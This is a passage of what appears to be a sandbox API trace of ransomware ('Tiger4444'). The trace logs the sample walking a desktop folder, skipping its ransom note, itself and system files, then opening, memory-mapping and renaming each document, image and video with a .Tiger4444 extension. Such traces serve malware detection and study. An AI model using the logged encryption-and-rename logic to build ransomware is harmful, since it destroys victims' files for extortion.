(hObject=0x2c8) returned 1 [0049.560] CloseHandle (hObject=0x260) returned 1 [0049.568] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\pLl2qR-HR2p6.wav.Tiger4444") returned 50 [0049.568] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\pLl2qR-HR2p6.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\pll2qr-hr2p6.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\pLl2qR-HR2p6.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\pll2qr-hr2p6.wav.tiger4444"), dwFlags=0x1) returned 1 [0049.568] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa614e230, ftCreationTime.dwHighDateTime=0x1d4d112, ftLastAccessTime.dwLowDateTime=0xbb882660, ftLastAccessTime.dwHighDateTime=0x1d4d291, ftLastWriteTime.dwLowDateTime=0xbb882660, ftLastWriteTime.dwHighDateTime=0x1d4d291, nFileSizeHigh=0x0, nFileSizeLow=0x5d5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rxUkDp.pdf", cAlternateFileName="")) returned 1 [0049.568] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.568] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.568] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2="Tiger4444.exe") returned -1 [0049.568] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2=".") returned 1 [0049.568] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2="..") returned 1 [0049.568] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2="windows") returned -1 [0049.568] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2="bootmgr") returned 1 [0049.568] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2="pagefile.sys") returned 1 [0049.569] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2="boot") returned 1 [0049.569] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2="ids.txt") returned 1 [0049.569] lstrcmpiW (lpString1="rxUkDp.pdf", lpString2="NTUSER.DAT") returned 1 [0049.569] lstrcpyW (in: lpString1=0x30aead8, lpString2="rxUkDp.pdf" | out: lpString1="rxUkDp.pdf") returned="rxUkDp.pdf" [0049.569] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\rxUkDp.pdf", dwFileAttributes=0x0) returned 1 [0049.569] lstrlenW (lpString="rxUkDp.pdf") returned 10 [0049.569] lstrlenW (lpString="Tiger4444") returned 9 [0049.569] lstrcmpiW (lpString1="xUkDp.pdf", lpString2="Tiger4444") returned 1 [0049.569] lstrlenW (lpString=".dll") returned 4 [0049.569] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.569] lstrlenW (lpString=".lnk") returned 4 [0049.569] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0049.569] lstrlenW (lpString=".ini") returned 4 [0049.569] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0049.569] lstrlenW (lpString=".sys") returned 4 [0049.569] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0049.569] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\rxUkDp.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\rxukdp.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.569] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.569] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14102229318) returned 1 [0049.569] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=23898) returned 1 [0049.569] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0049.569] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0049.569] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6060, lpName=0x0) returned 0x2c8 [0049.569] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6060) returned 0xbe0000 [0049.570] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.570] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0049.570] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.570] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0049.571] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.571] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0049.571] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.571] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0049.571] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14102398920) returned 1 [0049.571] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0049.571] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0049.571] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.571] CloseHandle (hObject=0x2c8) returned 1 [0049.571] CloseHandle (hObject=0x260) returned 1 [0049.572] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\rxUkDp.pdf.Tiger4444") returned 44 [0049.572] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\rxUkDp.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\rxukdp.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\rxUkDp.pdf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\rxukdp.pdf.tiger4444"), dwFlags=0x1) returned 1 [0049.572] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabd0ab70, ftCreationTime.dwHighDateTime=0x1d4cd64, ftLastAccessTime.dwLowDateTime=0xb40039f0, ftLastAccessTime.dwHighDateTime=0x1d4c7ec, ftLastWriteTime.dwLowDateTime=0xb40039f0, ftLastWriteTime.dwHighDateTime=0x1d4c7ec, nFileSizeHigh=0x0, nFileSizeLow=0xe775, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S7sxtg.ods", cAlternateFileName="")) returned 1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2="Tiger4444.exe") returned -1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2=".") returned 1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2="..") returned 1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2="windows") returned -1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2="bootmgr") returned 1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2="pagefile.sys") returned 1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2="boot") returned 1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2="ids.txt") returned 1 [0049.572] lstrcmpiW (lpString1="S7sxtg.ods", lpString2="NTUSER.DAT") returned 1 [0049.572] lstrcpyW (in: lpString1=0x30aead8, lpString2="S7sxtg.ods" | out: lpString1="S7sxtg.ods") returned="S7sxtg.ods" [0049.572] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\S7sxtg.ods", dwFileAttributes=0x0) returned 1 [0049.573] lstrlenW (lpString="S7sxtg.ods") returned 10 [0049.573] lstrlenW (lpString="Tiger4444") returned 9 [0049.573] lstrcmpiW (lpString1="7sxtg.ods", lpString2="Tiger4444") returned -1 [0049.573] lstrlenW (lpString=".dll") returned 4 [0049.573] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0049.573] lstrlenW (lpString=".lnk") returned 4 [0049.573] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0049.573] lstrlenW (lpString=".ini") returned 4 [0049.573] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0049.573] lstrlenW (lpString=".sys") returned 4 [0049.573] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0049.573] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\S7sxtg.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\s7sxtg.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.573] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.573] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14102629122) returned 1 [0049.573] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=59253) returned 1 [0049.573] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0049.573] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0049.573] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xea80, lpName=0x0) returned 0x2c8 [0049.573] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xea80) returned 0xbe0000 [0049.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0049.575] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0049.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.575] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0049.575] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.575] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0049.575] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14102812357) returned 1 [0049.575] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0049.575] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0049.575] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.576] CloseHandle (hObject=0x2c8) returned 1 [0049.576] CloseHandle (hObject=0x260) returned 1 [0049.576] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\S7sxtg.ods.Tiger4444") returned 44 [0049.576] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\S7sxtg.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\s7sxtg.ods"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\S7sxtg.ods.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\s7sxtg.ods.tiger4444"), dwFlags=0x1) returned 1 [0049.577] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x269dc7e0, ftCreationTime.dwHighDateTime=0x1d4d425, ftLastAccessTime.dwLowDateTime=0xcab066a0, ftLastAccessTime.dwHighDateTime=0x1d4cafa, ftLastWriteTime.dwLowDateTime=0xcab066a0, ftLastWriteTime.dwHighDateTime=0x1d4cafa, nFileSizeHigh=0x0, nFileSizeLow=0x31c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sKoLK4y.avi", cAlternateFileName="")) returned 1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2="Tiger4444.exe") returned -1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2=".") returned 1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2="..") returned 1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2="windows") returned -1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2="bootmgr") returned 1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2="pagefile.sys") returned 1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2="boot") returned 1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2="ids.txt") returned 1 [0049.577] lstrcmpiW (lpString1="sKoLK4y.avi", lpString2="NTUSER.DAT") returned 1 [0049.577] lstrcpyW (in: lpString1=0x30aead8, lpString2="sKoLK4y.avi" | out: lpString1="sKoLK4y.avi") returned="sKoLK4y.avi" [0049.577] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sKoLK4y.avi", dwFileAttributes=0x0) returned 1 [0049.578] lstrlenW (lpString="sKoLK4y.avi") returned 11 [0049.578] lstrlenW (lpString="Tiger4444") returned 9 [0049.578] lstrcmpiW (lpString1="oLK4y.avi", lpString2="Tiger4444") returned -1 [0049.578] lstrlenW (lpString=".dll") returned 4 [0049.578] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0049.578] lstrlenW (lpString=".lnk") returned 4 [0049.578] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0049.578] lstrlenW (lpString=".ini") returned 4 [0049.578] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0049.578] lstrlenW (lpString=".sys") returned 4 [0049.578] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0049.578] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sKoLK4y.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\skolk4y.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.578] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.578] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14103106224) returned 1 [0049.578] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=12740) returned 1 [0049.578] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0049.578] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0049.578] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x34d0, lpName=0x0) returned 0x2c8 [0049.578] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x34d0) returned 0xbe0000 [0049.579] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.579] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0049.579] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.579] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0049.579] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.579] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0049.579] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.579] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0049.579] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14103221269) returned 1 [0049.579] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0049.579] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0049.579] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.579] CloseHandle (hObject=0x2c8) returned 1 [0049.579] CloseHandle (hObject=0x260) returned 1 [0049.580] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\sKoLK4y.avi.Tiger4444") returned 45 [0049.580] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\sKoLK4y.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\skolk4y.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\sKoLK4y.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\skolk4y.avi.tiger4444"), dwFlags=0x1) returned 1 [0049.580] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63c3a100, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x63c3a100, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x62927400, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x2ee00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tiger4444.exe", cAlternateFileName="TIGER4~1.EXE")) returned 1 [0049.581] lstrcmpiW (lpString1="Tiger4444.exe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.581] lstrcmpiW (lpString1="Tiger4444.exe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.581] lstrcmpiW (lpString1="Tiger4444.exe", lpString2="Tiger4444.exe") returned 0 [0049.581] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1eab470, ftCreationTime.dwHighDateTime=0x1d4c6c1, ftLastAccessTime.dwLowDateTime=0x5fdcf2f0, ftLastAccessTime.dwHighDateTime=0x1d4cb43, ftLastWriteTime.dwLowDateTime=0x5fdcf2f0, ftLastWriteTime.dwHighDateTime=0x1d4cb43, nFileSizeHigh=0x0, nFileSizeLow=0x5501, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tLMtnmm.jpg", cAlternateFileName="")) returned 1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2="Tiger4444.exe") returned 1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2=".") returned 1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2="..") returned 1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2="windows") returned -1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2="bootmgr") returned 1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2="pagefile.sys") returned 1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2="boot") returned 1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2="ids.txt") returned 1 [0049.581] lstrcmpiW (lpString1="tLMtnmm.jpg", lpString2="NTUSER.DAT") returned 1 [0049.581] lstrcpyW (in: lpString1=0x30aead8, lpString2="tLMtnmm.jpg" | out: lpString1="tLMtnmm.jpg") returned="tLMtnmm.jpg" [0049.581] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\tLMtnmm.jpg", dwFileAttributes=0x0) returned 1 [0049.581] lstrlenW (lpString="tLMtnmm.jpg") returned 11 [0049.581] lstrlenW (lpString="Tiger4444") returned 9 [0049.581] lstrcmpiW (lpString1="Mtnmm.jpg", lpString2="Tiger4444") returned -1 [0049.581] lstrlenW (lpString=".dll") returned 4 [0049.581] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.581] lstrlenW (lpString=".lnk") returned 4 [0049.581] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0049.581] lstrlenW (lpString=".ini") returned 4 [0049.581] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0049.581] lstrlenW (lpString=".sys") returned 4 [0049.581] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0049.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\tLMtnmm.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\tlmtnmm.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.581] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.581] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14103458370) returned 1 [0049.582] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=21761) returned 1 [0049.582] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0049.582] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0049.582] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5810, lpName=0x0) returned 0x2c8 [0049.582] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5810) returned 0xbe0000 [0049.582] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.582] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0049.582] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.582] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0049.582] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.583] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0049.583] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.583] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0049.583] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14103585699) returned 1 [0049.583] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0049.583] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0049.583] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.583] CloseHandle (hObject=0x2c8) returned 1 [0049.583] CloseHandle (hObject=0x260) returned 1 [0049.584] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\tLMtnmm.jpg.Tiger4444") returned 45 [0049.584] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\tLMtnmm.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\tlmtnmm.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\tLMtnmm.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\desktop\\tlmtnmm.jpg.tiger4444"), dwFlags=0x1) returned 1 [0049.584] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x417bd7b0, ftCreationTime.dwHighDateTime=0x1d4cf9c, ftLastAccessTime.dwLowDateTime=0xeac19ed0, ftLastAccessTime.dwHighDateTime=0x1d4d155, ftLastWriteTime.dwLowDateTime=0xeac19ed0, ftLastWriteTime.dwHighDateTime=0x1d4d155, nFileSizeHigh=0x0, nFileSizeLow=0x2376, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TMtiGZYo.mp4", cAlternateFileName="")) returned 1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2="Tiger4444.exe") returned 1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2=".") returned 1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2="..") returned 1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2="windows") returned -1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2="bootmgr") returned 1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2="pagefile.sys") returned 1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2="boot") returned 1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2="ids.txt") returned 1 [0049.584] lstrcmpiW (lpString1="TMtiGZYo.mp4", lpString2="NTUSER.DAT") returned 1 [0049.584] lstrcpyW (in: lpString1=0x30aead8, lpString2="TMtiGZYo.mp4" | out: lpString1="TMtiGZYo.mp4") returned="TMtiGZYo.mp4" [0049.584] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\TMtiGZYo.mp4", dwFileAttributes=0x0) returned 1 [0049.584] lstrlenW (lpString="TMtiGZYo.mp4") returned 12 [0049.584] lstrlenW (lpString="Tiger4444") returned 9 [0049.585] lstrcmpiW (lpString1="iGZYo.mp4", lpString2="Tiger4444") returned -1 [0049.585] lstrlenW (lpString=".dll") returned 4 [0049.585] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0049.585] lstrlenW (lpString=".lnk") returned 4 [0049.585] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0049.585] lstrlenW (lpString=".ini") returned 4 [0049.585] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0049.585] lstrlenW (lpString=".sys") returned 4 [0049.585] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0049.585] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\TMtiGZYo.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\tmtigzyo.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 